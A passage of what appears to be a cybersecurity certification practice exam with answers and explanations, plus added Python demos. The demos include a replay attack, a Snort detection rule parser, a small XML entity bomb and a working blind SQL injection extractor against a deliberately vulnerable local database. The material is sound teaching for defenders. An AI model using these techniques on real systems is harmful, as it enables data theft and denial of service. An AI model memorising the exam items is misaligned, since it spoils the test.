Rick is upset that he was passed over for a promotion. He decides to take revenge on his nemesis, Mary, who got the job instead of him. Rick sets up a man-in-the-middle attack against Mary’s computer by redirecting any layer 2 traffic destined for the gateway to his own computer first. Rick is careful only to affect the traffic associated with Mary’s computer and not the entire network. Which type of man-in-the-middle attack is Rick conducting against Mary?

A. IP spoofing

B. MAC spoofing

C. ARP cache poisoning

D. Evil twin

A

C. ARP cache poisoning
Explanation
OBJ-4.1: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway’s address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary’s computer’s MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.

90
Q

Which of the following types of attacks are usually used as part of a man-in-the-middle attack?

A. Brute force

B. Spoofing

C. DDOS

D. Tailgating

A

B. Spoofing
Explanation
OBJ-4.1: A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other. One example of a MITM attack is active eavesdropping. The attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection. In fact, the entire conversation is controlled by the attacker. The attacker must intercept all relevant messages passing between the two victims and inject new ones. Spoofing is often used to inject the attacker into the conversation path between the two parties.

91
Q

An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building’s main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?

A. Mantrap

B. Tailgating

C. Shoulder surfing

D. Social engineering

A

B. Tailgating
Explanation
OBJ-4.2: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder.

92
Q

You are conducting a penetration test against an organization. You have captured the legitimate authentication handshake between a client and a server. Later in the day, you retransmit that session while spoofing your MAC address to that of the client. Which of the following exploits are you using?

A. Relay attack

B. Fragmentation attack

C. Replay attack

D. Downgrade attack

A

C. Replay attack
Explanation
OBJ-4.1: A replay attack repeats a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; the attacker who eavesdrops on this communication can use the authentication in a later transmission, essentially impersonating the victim. In wireless networking, replaying transmissions can be used to enable several different attacks. Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.
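Added worked example, not part of the practice exam: the capture-and-resend attack from the question, run against two toy authentication servers. Both use an HMAC over a constructed pre-shared key (an assumption for the demo; the real handshake's secret is whatever the client and server share). The first server checks only that the MAC verifies, so the sniffed handshake is accepted again verbatim; the second binds each login to a fresh server-issued nonce that is consumed on first use, so the same capture fails the second time. Spoofing the client's MAC address, as in the question, only changes where the replayed frame appears to come from; the server-side defence is the same.

```python
import hashlib
import hmac
import os

# Constructed pre-shared key for the demo; in the exam scenario this would be
# whatever secret the client and server use to build their handshake.
SHARED_KEY = b"demo-shared-key"


def tag(*parts: bytes) -> bytes:
    """HMAC-SHA256 over length-prefixed parts, so (b"a", b"bc") != (b"ab", b"c")."""
    h = hmac.new(SHARED_KEY, digestmod=hashlib.sha256)
    for part in parts:
        h.update(len(part).to_bytes(4, "big"))
        h.update(part)
    return h.digest()


class NaiveServer:
    """Accepts any (user, mac) whose MAC verifies. Nothing ties the message to
    one session, so a captured handshake is just as valid the second time."""

    def verify(self, user: bytes, mac: bytes) -> bool:
        return hmac.compare_digest(tag(user), mac)


class ChallengeServer:
    """Issues a fresh random nonce per login attempt and consumes it on use.
    A replayed handshake carries a nonce the server no longer recognises."""

    def __init__(self) -> None:
        self.outstanding = set()

    def challenge(self) -> bytes:
        nonce = os.urandom(16)
        self.outstanding.add(nonce)
        return nonce

    def verify(self, user: bytes, nonce: bytes, mac: bytes) -> bool:
        if nonce not in self.outstanding:
            return False                     # unknown or already-used nonce: a replay
        self.outstanding.discard(nonce)      # one-time use, even if the MAC turns out bad
        return hmac.compare_digest(tag(user, nonce), mac)


def replay_against_naive() -> tuple:
    """Sniff one legitimate handshake, then resend it verbatim."""
    server = NaiveServer()
    captured = (b"alice", tag(b"alice"))   # what the attacker saw on the wire
    return server.verify(*captured), server.verify(*captured)   # (True, True)


def replay_against_challenge() -> tuple:
    """Same capture-and-resend, but the handshake is bound to a server nonce."""
    server = ChallengeServer()
    nonce = server.challenge()
    captured = (b"alice", nonce, tag(b"alice", nonce))
    return server.verify(*captured), server.verify(*captured)   # (True, False)
```

A timestamp inside the MAC with a short acceptance window, plus a cache of recently seen tags, is the other common way to get the same one-time property when the server cannot keep a challenge round trip.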

93
Q

Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred?

A. DNS brute forcing

B. ARP spoofing

C. DNS poisoning

D. MAC spoofing

A

C. DNS poisoning
Explanation
OBJ-4.1: DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is an attack that exploits weaknesses in the Domain Name System (DNS) to plant a forged record in a resolver’s cache, so that later lookups send traffic to an attacker-chosen address; a cache server answering with the wrong IP is exactly that symptom. MAC spoofing is a technique for changing the factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is an attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network to associate their own layer 2 address with another host’s IP address. DNS brute-forcing enumerates hostnames (and exposes wildcard entries) by querying names from a dictionary or wordlist; it is used when the server does not permit a DNS zone transfer.

94
Q

You are reviewing a rule within your organization’s IDS. You see the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
msg:"BROWSER-IE Microsoft Internet Explorer
CacheSize exploit attempt";
flow:to_client,established;
file_data;
content:"recordset"; offset:14; depth:9;
content:".CacheSize"; distance:0; within:100;
pcre:"/CacheSize\s=\s/";
byte_test:10,>,0x3ffffffe,0,relative,string;
max-detect-ips drop, service http;
reference:cve,2016-8077;
classtype:attempted-user;
sid:65535;rev:1;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this rule, which of the following malicious packets would this IDS alert on?

A. A malicious inbound TCP packet

B. Any malicious outbound packets

C. A malicious outbound TCP packet

D. Any malicious inbound packets

A

A. A malicious inbound TCP packet
Explanation
OBJ-4.5: The rule header on the first line restricts this rule to TCP packets sourced from $EXTERNAL_NET on $HTTP_PORTS and destined for any port on $HOME_NET, that is, responses from outside web servers to internal clients. The flow option “to_client,established” narrows it further to traffic heading toward the client in a connection that has already completed its handshake, so only inbound packets on established sessions are evaluated against the content, pcre, and byte_test conditions. Therefore, this rule alerts on a malicious inbound TCP packet only when the packet matches all of the conditions listed. This rule is an example of a Snort IDS rule. For the exam, you do not need to write your own IDS rules, but you should be able to read one and pick out generic content such as the protocol covered by the signature, the ports being analyzed, and the direction of flow.
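Added worked example, not part of the practice exam: a small parser for the rule in the question that pulls out the things the explanation says you should be able to read off, the action, protocol, source and destination with their ports, the direction operator, and whether the flow option limits the rule to inbound traffic. The sample input is the question’s rule with two assumptions on my part about what its listing abbreviated: the option body is wrapped in parentheses, and the max-detect-ips policy is carried by a metadata: option, which is how Snort’s own rule syntax expresses it.

```python
from dataclasses import dataclass, field

# The rule from the question, reproduced as the parser's sample input. Two
# things are assumed here that the question's listing leaves out: the option
# body is wrapped in parentheses, and the "max-detect-ips" policy is carried
# by a "metadata:" option, which is how Snort's rule syntax expresses it.
RULE = r'''alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (
msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt";
flow:to_client,established;
file_data;
content:"recordset"; offset:14; depth:9;
content:".CacheSize"; distance:0; within:100;
pcre:"/CacheSize\s=\s/";
byte_test:10,>,0x3ffffffe,0,relative,string;
metadata:policy max-detect-ips drop, service http;
reference:cve,2016-8077;
classtype:attempted-user;
sid:65535; rev:1;
)'''


@dataclass
class SnortRule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    options: list = field(default_factory=list)   # [(name, value_or_None), ...] in rule order

    def values(self, name: str) -> list:
        """All values given for an option keyword (content: may appear several times)."""
        return [v for k, v in self.options if k == name]

    def flow(self) -> set:
        return {f.strip() for v in self.values("flow") for f in v.split(",")}

    def matches_inbound_only(self) -> bool:
        """to_client / from_server: only packets travelling toward the client side."""
        return bool(self.flow() & {"to_client", "from_server"})

    def summary(self) -> str:
        state = "established" if "established" in self.flow() else "any state"
        way = "server->client" if self.matches_inbound_only() else "client->server or either"
        return (f"{self.action} on {self.proto} {self.src}:{self.sport} {self.direction} "
                f"{self.dst}:{self.dport}, {state}, {way}, sid {self.values('sid')[0]}")


def split_options(body: str) -> list:
    """Split the option body on ';' but not inside double-quoted values
    (a content: or pcre: value may legitimately contain a semicolon)."""
    out, cur, quoted, escaped = [], [], False, False
    for ch in body:
        if escaped:
            cur.append(ch)
            escaped = False
        elif ch == "\\" and quoted:
            cur.append(ch)
            escaped = True
        elif ch == '"':
            quoted = not quoted
            cur.append(ch)
        elif ch == ";" and not quoted:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return [o for o in out if o]


def parse_rule(text: str) -> SnortRule:
    header, _, rest = text.partition("(")
    body = rest.rsplit(")", 1)[0]
    parts = header.split()   # action proto src sport direction dst dport
    if len(parts) != 7 or parts[4] not in ("->", "<>"):
        raise ValueError(f"unexpected rule header: {header.strip()!r}")
    rule = SnortRule(*parts)
    for opt in split_options(body):
        name, sep, value = opt.partition(":")
        value = value.strip()
        if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        rule.options.append((name.strip(), value if sep else None))   # bare keywords keep None
    return rule
```

parse_rule(RULE).summary() reads “alert on tcp $EXTERNAL_NET:$HTTP_PORTS -> $HOME_NET:any, established, server->client, sid 65535”, which is the answer to the question in one line.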

95
Q

During a business trip, Bobby connects to the hotel’s wireless network to send emails to some of his clients. The next day, Bobby notices that additional emails have been sent out from his account without consent. Which of the following protocols was MOST likely used to compromise Bobby’s email password utilizing a network sniffer?

A. SSL

B. HTTP

C. TFTP

D. DNS

A

B. HTTP
Explanation
OBJ-4.1: HTTP is an unsecured protocol, and information is passed without encryption. If the user signed into their webmail over HTTP instead of HTTPS, a network sniffer could compromise the username and password. Additionally, if the user was using an email client, then the SMTP connection could have been compromised, but since that wasn’t an option in this question, we must assume Bobby used a webmail client over HTTP instead.

96
Q

An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development?

A. Dynamic code analysis

B. Pair programming

C. Manual Peer Review

D. Static code analysis

A

D. Static code analysis
Explanation
OBJ-5.1: Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. DevSecOps methodology would also improve the likelihood of detecting such an error but still rely on human-to-human interactions and human understanding of source code to detect the fault. Dynamic code analysis also may have detected this if the test found exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively.

97
Q

Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events?

A. SQL injection

B. Cross-site scripting

C. Cross-site request forgery

D. Rootkit

A

B. Cross-site scripting
Explanation
OBJ-5.2: This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If the web application does not validate or encode user-supplied input before rendering it in a public posting, an attacker can inject a script that creates a pop-up window collecting passwords and then uses that information to compromise further accounts. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the victim’s browser (such as creating pop-ups). A CSRF would allow an attacker to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or SQL injection.

98
Q

A web developer wants to protect their new web application from a man-in-the-middle attack. Which of the following controls would best prevent an attacker from stealing tokens stored in cookies?

A. Forcing the use of TLS for the web application

B. Forcing the use of SSL for the web application

C. Setting the secure attribute on the cookie

D. Hashing the cookie value

A

C. Setting the secure attribute on the cookie
Explanation
OBJ-5.1: When a cookie has the Secure attribute, the user agent includes the cookie in an HTTP request only if the request is transmitted over a secure channel (typically HTTPS). Although seemingly useful for protecting cookies from active network attackers, the Secure attribute protects only the cookie’s confidentiality. Forcing the web application to use TLS or SSL does not by itself keep the cookie off the wire in the clear: unless HSTS is also enforced, a browser will still attach a cookie that lacks the Secure attribute to a plain http:// request for the same host, which an on-path attacker can induce, so you still need to set the cookie’s Secure attribute. Hashing the cookie value provides integrity, not confidentiality, so it does not solve the problem posed by this question.

99
Q

You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner’s findings in the automated report. Which of the following is MOST likely to be a false positive?

A. Missing secure flag for the site’s cookies

B. Version disclosure of server information

C. Supports weak cipher suites

D. Unencrypted transfer of data

A

B. Version disclosure of server information
Explanation
OBJ-5.1: The disclosure of internal server information, such as its version, is a common finding on both static and dynamic webpages. This disclosure can occur through banner grabbing or by reviewing the source code of the webpage.
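Added worked example, not part of the practice exam, covering the two cookie questions above (the Secure attribute in question 98 and the “missing secure flag” scanner finding in question 99): an audit function that parses a Set-Cookie header value, reports the missing Secure, HttpOnly and SameSite attributes, and answers the question a scanner is really asking, whether a browser would send this cookie over plain http://. The header values and cookie names are constructed for the example.

```python
from dataclasses import dataclass, field

# Constructed Set-Cookie header values standing in for what a scanner would
# see from the application (names and values are made up for the example).
WEAK_COOKIE = "session=7f3a9c; Path=/"
HARDENED_COOKIE = "__Host-session=7f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax"


@dataclass
class CookieAudit:
    name: str
    attrs: dict                         # attribute name (lower-cased) -> value ("" for flags)
    findings: list = field(default_factory=list)

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs

    def sent_on(self, scheme: str) -> bool:
        """Would a browser attach this cookie to a request over `scheme`?
        A Secure cookie is only ever sent over https (RFC 6265, section 4.1.2.5)."""
        return scheme == "https" or not self.secure


def parse_set_cookie(header: str) -> CookieAudit:
    # Set-Cookie: <name>=<value>; <Attr>[=<val>]; ...   attribute names are case-insensitive
    segments = [s.strip() for s in header.split(";")]
    name = segments[0].split("=", 1)[0].strip()
    attrs = {}
    for seg in segments[1:]:
        key, _, val = seg.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return CookieAudit(name, attrs)


def audit_set_cookie(header: str) -> CookieAudit:
    """The checks a scanner runs; each finding names the attack it leaves open."""
    audit = parse_set_cookie(header)
    a = audit.attrs
    if "secure" not in a:
        audit.findings.append("missing Secure: the browser will send the cookie over plain "
                              "http://, where an on-path attacker can read the token")
    if "httponly" not in a:
        audit.findings.append("missing HttpOnly: document.cookie exposes the token to injected script")
    if a.get("samesite", "").lower() not in ("lax", "strict"):
        audit.findings.append("SameSite not Lax/Strict: cookie rides along on cross-site requests")
    if audit.name.startswith("__Host-") and not (
            "secure" in a and a.get("path") == "/" and "domain" not in a):
        audit.findings.append("__Host- prefix requires Secure, Path=/ and no Domain attribute")
    return audit


def harden_set_cookie(name: str, value: str, samesite: str = "Lax") -> str:
    """Emit the Set-Cookie value the developer in the question should send."""
    return f"__Host-{name}={value}; Path=/; Secure; HttpOnly; SameSite={samesite}"
```

The __Host- prefix is worth the extra line: a browser refuses to store such a cookie at all unless it was set with Secure and Path=/ over a secure origin, so the Secure attribute cannot be quietly dropped later.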

100
Q

You are conducting threat hunting for an online retailer. Upon analyzing their web server, you identified that a single HTML response returned as 45 MB in size, but an average response is normally only 275 KB. Which of the following categories of potential indicators of compromise would you classify this as?

A. Beaconing

B. Data exfiltration

C. Introduction of new accounts

D. Unauthorized privilege

A

B. Data exfiltration
Explanation
OBJ-5.1: If attackers use SQL injection to extract data through a Web application, the requests issued by them will usually have a larger HTML response size than a normal request. For example, if the attacker extracts the full credit card database, then a single response for that attacker might be 20 to 50 MB, where a normal response is only 200 KB. Therefore, this scenario is an example of a data exfiltration indicator of compromise. Based on the scenario, there is no evidence that a user is conducting a privilege escalation or using unauthorized privileges. There is also no evidence of a new account having been created or beaconing occurring over the network.

101
Q

What is a common Simple Object Access Protocol (SOAP) vulnerability?

A. Cross-site scripting

B. SQL injection

C. Xpath injection

D. XML denial of service issues

A

D. XML denial of service issues
Explanation
OBJ-5.1: An XML denial of service (or XML bomb) declares nested entities in the document’s DTD so that each one expands into many copies of the one below it; a document of a few hundred bytes then explodes into gigabytes of text when parsed, exhausting the system’s memory until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document, making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on web sites that use user-supplied information to construct an XPath query for XML data.
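Added worked example, not part of the practice exam: a deliberately tiny version of the entity-expansion bomb (three tenfold levels instead of the usual ten, so it expands to 3,000 bytes rather than 10^10 copies) parsed two ways with the Python standard library. The stock ElementTree parser expands the entities in full, which is the behaviour the attack relies on; the second parser hooks expat’s entity-declaration callback and refuses the document before anything is expanded, which is what a SOAP endpoint should do.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed, deliberately small "billion laughs" document: three levels of
# tenfold expansion, so &lol3; inflates to 10*10*10*len("lol") = 3000 bytes
# of text from a document of about 300 bytes. A real one uses ~10 levels,
# which is 10**10 copies, and a parser that expands it exhausts memory.
TINY_BOMB = """<?xml version="1.0"?>
<!DOCTYPE r [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<r>&lol3;</r>"""


def expanded_text_size(doc: str) -> int:
    """Parse with the stock ElementTree parser, which honours internal entity
    declarations in the DTD and expands them in full."""
    root = ET.fromstring(doc)
    return len(root.text or "")


class EntityDeclarationRejected(ValueError):
    """Raised as soon as the DTD tries to declare an entity."""


def text_without_entities(doc: str) -> str:
    """Parse with expat directly and abort on the first <!ENTITY ...> declaration,
    before anything can be expanded. The neighbouring ExternalEntityRefHandler
    is where external entity fetching (XXE) is shut off in the same way."""
    chunks = []

    def reject(name, is_parameter, value, base, system_id, public_id, notation):
        raise EntityDeclarationRejected(f"entity declaration {name!r} refused")

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = reject
    parser.CharacterDataHandler = chunks.append
    parser.Parse(doc, True)
    return "".join(chunks)


def parse_or_none(doc: str):
    """What a SOAP endpoint should do: refuse the document rather than expand it."""
    try:
        return text_without_entities(doc)
    except EntityDeclarationRejected:
        return None
```

Rejecting all entity declarations is the simplest policy and the right one for a message format like SOAP that never needs them; parsers that must accept a DTD should instead cap total expansion (newer libexpat enforces an amplification limit once output passes a size threshold, but the cap only triggers for large outputs, so do not rely on it alone).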

102
Q

Which of the following is a characteristic of a Blind SQL Injection vulnerability?

A. Administrator of the vulnerable application cannot see the request to the webserver

B. Application properly filters the user input but it is still vulnerable to code injection in a blind attack

C. Administrator of the affected application does not see an error message during a successful attack

D. An attacker cannot see any of the display errors with information about the injection during a blind attack

A

D. An attacker cannot see any of the display errors with information about the injection during a blind attack
Explanation
OBJ-5.3: Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.
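Added worked example, not part of the practice exam: the “true or false questions” from the explanation, carried out against a constructed SQLite-backed lookup. The vulnerable function concatenates the id into its query and, like a page configured for generic errors, returns nothing but found / not found; the attacker turns that single bit into an oracle and recovers the admin password one character at a time by binary search, never seeing an error message. The parameterised version beside it is the fix.

```python
import sqlite3

PASSWORD = "S3cret!"   # constructed secret the attacker will recover blind


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', ?)", (PASSWORD,))
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> bool:
    """DELIBERATELY VULNERABLE: the id is concatenated into the SQL. The only
    thing the caller learns is found / not found, and any SQL error becomes the
    same generic 'not found' page, which is exactly the blind scenario."""
    query = "SELECT id FROM users WHERE id = " + user_id
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> bool:
    """Fixed version: type validation plus a parameterised query."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    return conn.execute("SELECT id FROM users WHERE id = ?", (uid,)).fetchone() is not None


class BlindOracle:
    """Turns the found / not-found response into a yes/no answer to one question."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.queries = 0

    def ask(self, condition: str) -> bool:
        self.queries += 1
        # Injected payload: id 1 exists, so the page says 'found' iff condition is true.
        return vulnerable_lookup(self.conn, f"1 AND ({condition})")


SECRET = "(SELECT password FROM users WHERE username = 'admin')"


def extract_password(oracle: BlindOracle, max_len: int = 64) -> str:
    # Step 1: the length, one yes/no question per candidate.
    length = next(n for n in range(max_len + 1) if oracle.ask(f"length({SECRET}) = {n}"))
    # Step 2: each character's code point by binary search over printable ASCII,
    # asking 'is the code point greater than mid?' about seven times per character.
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr({SECRET}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered
```

Seven characters cost under sixty requests here; in a web log that shows up as a burst of near-identical requests to one endpoint whose parameter differs only in a number, which is the detection angle.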

103
Q

A factory worker suspects that a legacy workstation is infected with malware. The workstation runs Windows XP and is used as part of an ICS/SCADA system to control industrial factory equipment. The workstation is connected to an isolated network that cannot reach the internet. The workstation receives the patterns for the manufactured designs through a USB drive. A technician is dispatched to remove the malware from this workstation. After its removal, the technician provides the factory worker with a new USB drive to move the pattern files to the workstation. Within a few days, the factory worker contacts the technician again to report the workstation appears to be reinfected with malware. Which of the following steps did the technician MOST likely forget to perform to prevent reinfection?

A. Quarantine the infected system

B. Disable System Restore (in Windows)

C. Remediate the infected systems

D. Update the anti-malware solution

E. Enable System Restore and create a restore point (in Windows)

F. Identify and research malware symptoms

A

D. Update the anti-malware solution
Explanation
OBJ-7.2: Since the workstation is isolated from the internet, the anti-malware solution will need to be manually updated to ensure it has the latest virus definitions. Without the latest virus definitions, the system can easily become reinfected.

104
Q

Dion Training Solutions has just installed a backup generator for their offices that use SCADA/ICS for remote monitoring of the system. The generator’s control system has an embedded cellular modem that periodically connects to the generator’s manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training’s other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risks is being assumed in this scenario?

A. There is minimal risk being assumed since the cellular modem is configured for outbound connections only

B. There is high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator

C. There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attacker exploits the generator and then pivots to the production environment

D. There is medium risk being assumed since the manufacturer could use the data for purposes other than originally agreed upon

A

A. There is minimal risk being assumed since the cellular modem is configured for outbound connections only
Explanation
OBJ-7.2: There is minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer’s data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.

105
Q

An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future?

A. Implement a VLAN to separate the HVAC control system from the open wireless network

B. Install an IDS to protect the HVAC system

C. Enable NAC on the open wireless network

D. Enable WPA2 security on the open wireless network

A

A. Implement a VLAN to separate the HVAC control system from the open wireless network
Explanation
OBJ-7.2: A VLAN is used to segment network traffic into separate parts of the network and would stop someone on the open wireless network from reaching the HVAC controls at all. With NAC, each machine connecting to the open wireless network could be checked for compliance and identified as a ‘known’ machine, but a compliant machine would still be given access to the entire network; and since this is a publicly usable network, NAC would lock visitors out of features they are supposed to use. An IDS would be a good solution to detect the attempted logins, but it will not prevent them; an IPS would be required to block them. WPA2 would encrypt the wireless traffic, but the question states that the network must remain open.

106
Q

Which of the following exploitation frameworks contain plugins that can trigger buffer overflows in SCADA systems, such as /exploit/windows/scada/daq_factory_bof that can trigger a stack overflow by sending excessive requests to a service port on the system?

A. Nessus

B. Androzer

C. Metasploit

D. Nikto

A

C. Metasploit
Explanation
OBJ-7.2: Metasploit is an open-source exploitation framework whose exploits and auxiliary functions are packaged as modules. Modules are named by a path-like hierarchy, such as exploit/windows/scada/daq_factory_bof (the leading slash in the question is not part of the module name), which identifies the module type (exploit), the target platform (windows), the service or product family (scada), and the specific module (daq_factory_bof). If you see this format in a question, the answer is most likely Metasploit related.

107
Q

Due to a global pandemic, your company decides to implement a telework policy for its employees. Unfortunately, the company doesn’t have enough time to issue laptops and smartphones to each employee. The Chief Information Officer (CIO) has decided to allow employees to use their own laptops and smartphones when conducting their work from home. Which of the following policies and technology should be implemented to provide security guidance to employees on the use of these devices? (Select TWO)

A. EULA

B. BYOD

C. COPE

D. MDM

E. DRM

F. ACL

A

B. BYOD
D. MDM
Explanation
OBJ-7.1: The Bring Your Own Device (BYOD) policy is a security framework used to facilitate the use of personally-owned devices to access corporate networks and data. Mobile Device Management (MDM) is a class of management software designed to apply security policies to the use of mobile devices in the enterprise. Since the employees will be using their own laptops and smartphones, the company will need a good BYOD policy to provide security guidance. The company may also implement and install MDM across the employee’s devices to better secure the BYOD devices if they give the company permission.

108
Q

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?

A. Intrusion prevention system

B. Anti-virus software

C. Automated patch deployment

D. Log consolidation

A

A. Intrusion prevention system
Explanation
OBJ-7.2: Since this question is focused on the ICS/SCADA network, the best first step is an intrusion prevention system. ICS/SCADA devices use a narrow, predictable set of commands to control equipment, so strict IPS rules can block anything outside that expected set before it reaches the controllers. Log consolidation is a good idea, but it will not prevent an issue and therefore is not the most critical thing to add first. Automated patch deployment should not be used, because patches must be tested before being applied to ICS/SCADA systems; they frequently break ICS/SCADA functionality. Anti-virus software may not even run on the equipment, since many ICS/SCADA devices do not use standard operating systems such as Windows.

109
Q

Which of the following is NOT considered part of the Internet of Things?

A. SCADA

B. ICS

C. Smart television

D. Laptop

A

D. Laptop
Explanation
OBJ-7.2: Supervisory control and data acquisition (SCADA) systems, industrial control systems (ICS), internet-connected televisions, thermostats, and many other things are examples of devices classified as the Internet of Things (IoT). A laptop would be better classified as a computer or host than as part of the Internet of Things. The Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines provided with unique identifiers (UIDs), and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

110
Q

Which of the following type of threats did the Stuxnet attack rely on to cross an airgap between a business and an industrial control system network?

A. Directory traversal

B. Cross-site scripting

C. Removable media

D. Session hijacking

A

C. Removable media
Explanation
OBJ-7.2: Airgaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.

111
Q

Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and remotely wipe corporate information without affecting the user’s personal data?

A. Face ID

B. Long and complex passwords

C. Touch ID

D. Containerization

A

D. Containerization
Explanation
